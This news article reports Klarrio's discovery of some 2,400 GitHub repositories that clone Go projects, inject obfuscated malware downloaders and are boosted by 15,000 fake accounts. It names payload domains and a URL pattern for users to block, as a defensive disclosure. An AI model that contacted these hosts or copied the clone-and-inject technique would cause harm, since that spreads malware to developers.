Klarrio Uncovers Large-Scale Malware Network on GitHub

Klarrio Uncovers Large-Scale Malware Network on GitHub
Image: Klarrio

Klarrio has exposed a network of 2,400 malware-infected repositories and 15,000 fake accounts on GitHub that mimic legitimate open source projects to deceive users.

An investigation by Antwerp-based Klarrio has led to the discovery of 2,400 malware-infected repositories on GitHub. Additionally, 15,000 fake accounts were identified that gave these repositories positive ratings to increase their visibility.

Klarrio is a software company specializing in cloud-native and cloud-agnostic solutions, based in Antwerp. The discovery of the malicious repositories was made by the company’s CTO: Bruno De Bus. He was concerned about suspicious open source projects on GitHub from an internal security perspective.

From Internal Analysis to Large Malware Network

During an analysis of a seemingly legitimate project in the Go programming language, De Bus discovered that the repository was a clone of the original project. The difference was in obfuscated code that invisibly downloaded malware. Notably, the cloned project received more positive ratings than the original.

Klarrio’s CTO expanded the investigation and traced hundreds of similar repositories with comparable characteristics. A pattern emerged where bots clone popular projects, republish them under different accounts, and inject the code with malware. Automatically generated accounts then give positive ratings to these malicious repositories, creating a false sense of reliability for users.

Some of these malicious repositories continuously rewrite themselves, presumably with the help of AI, to avoid detection.

Recognizable URL Structure

The malicious code retrieves its payload via fixed URL structures. These follow the pattern https:///storage/ with example domains including alturastreet.icu, kaspmirror.icu, and sharegolem.com.

Klarrio advises GitHub users to actively block these types of URL patterns or include them in monitoring rules. The complete list of suspicious repositories and accounts has since been provided to GitHub and the appropriate people for the Go repository. Klarrio also makes a copy of the investigation available for those who want more insight into the methodology and scale of the network.

With this discovery, Klarrio underscores the need for stringent controls on open source platforms, especially in environments where open source components are widely used within enterprise software.